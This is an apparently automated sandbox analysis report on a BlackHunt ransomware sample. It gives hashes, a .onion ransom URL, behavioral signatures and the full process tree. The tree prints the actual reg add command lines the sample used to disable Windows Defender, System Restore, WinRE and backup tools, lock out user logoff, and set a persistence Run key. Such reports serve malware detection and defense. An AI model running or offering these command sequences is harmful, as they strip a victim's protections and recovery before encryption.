Analysis
max time kernel: 165s
max time network: 199s
platform: windows10-2004_x64
resource: win10v2004-20231215-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19/01/2024, 00:18

Static task: static1

Behavioral task: behavioral1
Sample: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe
Resource: win7-20231129-en

Behavioral task: behavioral2
Sample: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe
Resource: win10v2004-20231215-en
General
Target: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe
Size: 707KB
MD5: 107d5484b3d34e5560406e214e6c1d0e
SHA1: 939d1b225cbb7ec7ca8c739d1b6f4f49032e1774
SHA256: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a
SHA512: 8c0e52726bb77a7ca34c1a6bffbfce769c1d40c8154f0d2e51ac9fab76b8e166fba0c431da42114ed9f781742efa2e7786e31f245a47df7e07daff69d8867c2c
SSDEEP: 6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza158ivnh:6uaTmkZJ+naie5OTamgEoKxLWcsh
Malware Config
Extracted from: C:\ProgramData\#BlackHunt_ReadMe.hta
Extracted strings:
- http-equiv="x-ua-compatible"
- http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures

Deletes NTFS Change Journal (2 TTPs, 1 IoC)
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
- PID 5896, fsutil.exe

Modifies Windows Defender Real-time Protection settings
- Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection (reg.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" (reg.exe)

(signature heading not preserved in the report)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe)

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTPs, 2 IoCs)
- PID 3396, bcdedit.exe
- PID 5772, bcdedit.exe

Renames multiple (641) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.

(signature heading not preserved in the report)
- PID 3488, wbadmin.exe

Disables Task Manager via registry modification

Disables use of System Restore points (1 TTPs)

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
- Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation (9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe)

Adds Run key to start application (2 TTPs, 1 IoC)
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" (reg.exe)

(signature heading not preserved in the report)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe)
Enumerates connected drives (3 TTPs, 25 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Process is 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe unless noted otherwise.
- File opened (read-only) \??\A:
- File opened (read-only) \??\G:
- File opened (read-only) \??\B:
- File opened (read-only) \??\L:
- File opened (read-only) \??\Q:
- File opened (read-only) \??\O:
- File opened (read-only) \??\H:
- File opened (read-only) \??\N:
- File opened (read-only) \??\W:
- File opened (read-only) \??\Z:
- File opened (read-only) \??\F: (vssadmin.exe)
- File opened (read-only) \??\E:
- File opened (read-only) \??\P:
- File opened (read-only) \??\F: (vssadmin.exe)
- File opened (read-only) \??\I:
- File opened (read-only) \??\S:
- File opened (read-only) \??\V:
- File opened (read-only) \??\T:
- File opened (read-only) \??\U:
- File opened (read-only) \??\K:
- File opened (read-only) \??\M:
- File opened (read-only) \??\R:
- File opened (read-only) \??\Y:
- File opened (read-only) \??\J:
- File opened (read-only) \??\X:

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
- Flow 6, ip-api.com
Drops file in Program Files directory (64 IoCs)
Process for every entry: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe
- File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\#BlackHunt_ReadMe.txt
- File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\#BlackHunt_ReadMe.txt
- File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#BlackHunt_Private.key
- File opened for modification C:\Program Files\CheckpointSearch.wm
- File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\xerces.md
- File created C:\Program Files\VideoLAN\VLC\locale\cy\#BlackHunt_ReadMe.txt
- File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#BlackHunt_ReadMe.hta
- File opened for modification C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\vlc.mo
- File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\#BlackHunt_ReadMe.txt
- File created C:\Program Files\VideoLAN\VLC\locale\si\#BlackHunt_Private.key
- File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#BlackHunt_ReadMe.hta
- File created C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\#BlackHunt_ReadMe.txt
- File opened for modification C:\Program Files\Java\jdk-1.8\release
- File opened for modification C:\Program Files\Java\jre-1.8\Welcome.html
- File opened for modification C:\Program Files\ResizeSubmit.eprtx
- File opened for modification C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\vlc.mo
- File created C:\Program Files\VideoLAN\VLC\locale\wa\#BlackHunt_ReadMe.txt
- File opened for modification C:\Program Files\7-Zip\Lang\cy.txt
- File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_pt_BR.properties
- File opened for modification C:\Program Files\Java\jre-1.8\lib\tzmappings
- File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\#BlackHunt_ReadMe.txt
- File opened for modification C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\vlc.mo
- File opened for modification C:\Program Files\7-Zip\Lang\br.txt
- File opened for modification C:\Program Files\Java\jre-1.8\lib\javafx.properties
- File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\#BlackHunt_ReadMe.hta
- File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png
- File created C:\Program Files\VideoLAN\VLC\lua\http\images\#BlackHunt_Private.key
- File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\meta-index
- File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaBrightItalic.ttf
- File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\dom.md
- File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#BlackHunt_ReadMe.txt
- File created C:\Program Files\VideoLAN\VLC\locale\uk\#BlackHunt_ReadMe.txt
- File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png
- File opened for modification C:\Program Files\7-Zip\Lang\sv.txt
- File created C:\Program Files\VideoLAN\VLC\locale\lt\#BlackHunt_ReadMe.txt
- File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\#BlackHunt_ReadMe.hta
- File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\#BlackHunt_ReadMe.hta
- File created C:\Program Files\VideoLAN\VLC\locale\ru\#BlackHunt_ReadMe.hta
- File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png
- File opened for modification C:\Program Files\7-Zip\Lang\mk.txt
- File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\#BlackHunt_ReadMe.hta
- File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\#BlackHunt_ReadMe.txt
- File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\vlc.mo
- File opened for modification C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\vlc.mo
- File created C:\Program Files\VideoLAN\VLC\locale\hu\#BlackHunt_Private.key
- File created C:\Program Files\VideoLAN\VLC\locale\ml\#BlackHunt_ReadMe.txt
- File opened for modification C:\Program Files\7-Zip\Lang\ru.txt
- File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\xerces.md
- File created C:\Program Files\VideoLAN\VLC\locale\af\#BlackHunt_ReadMe.hta
- File created C:\Program Files\VideoLAN\VLC\locale\brx\#BlackHunt_ReadMe.txt
- File created C:\Program Files\VideoLAN\VLC\locale\gu\#BlackHunt_ReadMe.hta
- File created C:\Program Files\dotnet\host\fxr\#BlackHunt_Private.key
- File created C:\Program Files\dotnet\host\fxr\8.0.0\#BlackHunt_ReadMe.hta
- File created C:\Program Files\Java\jre-1.8\bin\plugin2\#BlackHunt_ReadMe.hta
- File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\cldr.md
- File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\#BlackHunt_ReadMe.hta
- File created C:\Program Files\VideoLAN\VLC\locale\en_GB\#BlackHunt_ReadMe.hta
- File created C:\Program Files\VideoLAN\VLC\locale\fur\#BlackHunt_ReadMe.txt
- File created C:\Program Files\VideoLAN\VLC\locale\lg\#BlackHunt_Private.key
- File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\#BlackHunt_Private.key
- File opened for modification C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo
- File created C:\Program Files\VideoLAN\VLC\locale\ms\#BlackHunt_ReadMe.hta
- File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\content-types.properties
- File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_de.properties
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Checks SCSI registry key(s) (3 TTPs, 4 IoCs)
SCSI information is often read in order to detect sandboxing environments.
- Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 (vds.exe)
- Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName (vds.exe)
- Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 (vds.exe)
- Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName (vds.exe)

Creates scheduled task(s) (1 TTPs, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
- PID 5260, schtasks.exe

Interacts with shadow copies (2 TTPs, 5 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
- PID 5360, vssadmin.exe
- PID 5936, vssadmin.exe
- PID 6052, vssadmin.exe
- PID 2532, vssadmin.exe
- PID 220, vssadmin.exe

Modifies registry class (10 IoCs)
- Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon (reg.exe)
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" (reg.exe)
- Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon (reg.exe)
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ (Process not Found)
- Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 (reg.exe)
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ (reg.exe)
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 (reg.exe)
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon (reg.exe)
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" (reg.exe)
- Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 (Process not Found)
Suspicious use of AdjustPrivilegeToken (13 IoCs)
- Token: SeDebugPrivilege, PID 1376, 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe
- Token: SeRestorePrivilege, PID 1376, 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe
- Token: SeBackupPrivilege, PID 1376, 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe
- Token: SeTakeOwnershipPrivilege, PID 1376, 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe
- Token: SeAuditPrivilege, PID 1376, 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe
- Token: SeSecurityPrivilege, PID 1376, 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe
- Token: SeIncBasePriorityPrivilege, PID 1376, 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe
- Token: SeBackupPrivilege, PID 5464, vssvc.exe
- Token: SeRestorePrivilege, PID 5464, vssvc.exe
- Token: SeAuditPrivilege, PID 5464, vssvc.exe
- Token: SeBackupPrivilege, PID 6080, wbengine.exe
- Token: SeRestorePrivilege, PID 6080, wbengine.exe
- Token: SeSecurityPrivilege, PID 6080, wbengine.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Columns: writing PID, target PID, writing process, target procid. The report records every write twice; each pair below therefore stands for two IoCs. The writing process is 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe unless noted as cmd.exe.
- PID 1376 wrote to memory of 1860, procid_target 88
- PID 1376 wrote to memory of 4016, procid_target 90
- PID 1376 wrote to memory of 1928, procid_target 92
- PID 1376 wrote to memory of 3692, procid_target 94
- PID 1376 wrote to memory of 2364, procid_target 96
- PID 2364 wrote to memory of 1788 (cmd.exe), procid_target 100
- PID 1928 wrote to memory of 2600 (cmd.exe), procid_target 98
- PID 1860 wrote to memory of 4008 (cmd.exe), procid_target 103
- PID 3692 wrote to memory of 5016 (cmd.exe), procid_target 101
- PID 4016 wrote to memory of 1540 (cmd.exe), procid_target 102
- PID 1376 wrote to memory of 1976, procid_target 105
- PID 1376 wrote to memory of 4572, procid_target 107
- PID 1376 wrote to memory of 3732, procid_target 111
- PID 1376 wrote to memory of 1812, procid_target 110
- PID 1376 wrote to memory of 2708, procid_target 112
- PID 1376 wrote to memory of 4304, procid_target 114
- PID 1376 wrote to memory of 4848, procid_target 117
- PID 1376 wrote to memory of 2060, procid_target 118
- PID 1376 wrote to memory of 4540, procid_target 120
- PID 1376 wrote to memory of 844, procid_target 123
- PID 1376 wrote to memory of 4444, procid_target 125
- PID 1376 wrote to memory of 1388, procid_target 129
- PID 1376 wrote to memory of 4684, procid_target 127
- PID 1376 wrote to memory of 2036, procid_target 130
- PID 1376 wrote to memory of 2352, procid_target 138
- PID 1376 wrote to memory of 4200, procid_target 132
- PID 1376 wrote to memory of 2416, procid_target 135
- PID 1376 wrote to memory of 632, procid_target 134
- PID 1376 wrote to memory of 1436, procid_target 141
- PID 1376 wrote to memory of 5068, procid_target 140
- PID 1376 wrote to memory of 1992, procid_target 146
- PID 1376 wrote to memory of 588, procid_target 144
System policy modification (1 TTPs, 3 IoCs)
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System (9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" (9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe)

Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
Each entry gives the image path, the command line, the PID and the signatures matched on that process; indentation shows the parent/child depth.

C:\Users\Admin\AppData\Local\Temp\9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe"
  PID: 1376
  - UAC bypass
  - Checks computer location settings
  - Checks whether UAC is enabled
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - System policy modification

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
    PID: 1860
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
      PID: 4008
      - Modifies registry class

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    PID: 4016
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      PID: 1540
      - Modifies registry class

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
    PID: 1928
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
      PID: 2600

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    PID: 3692
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      PID: 5016
      - Modifies registry class

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
    PID: 2364
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
      PID: 1788
      - Adds Run key to start application

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    PID: 1976

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      PID: 3372

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
    PID: 4572

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
      PID: 3672
      - Modifies Windows Defender Real-time Protection settings

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
    PID: 1812

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
      PID: 1028

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
    PID: 3732

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
      PID: 4144

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
    PID: 2708

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
      PID: 2408

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
    PID: 4304

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
      PID: 4180

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
    PID: 4848

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
      PID: 2952

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
    PID: 2060

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
      PID: 916

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
    PID: 4540

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
      PID: 1760

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
    PID: 844

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
      PID: 3648

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
    PID: 4444

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
      PID: 4888

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
    PID: 4684

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
      PID: 1444

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
    PID: 1388

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
      PID: 1720

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
    PID: 2036

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
      PID: 1268

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
    PID: 4200
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:632
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:5376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2416
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:5276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2352
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:5068
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:5244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1436
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:4508
-
-
-
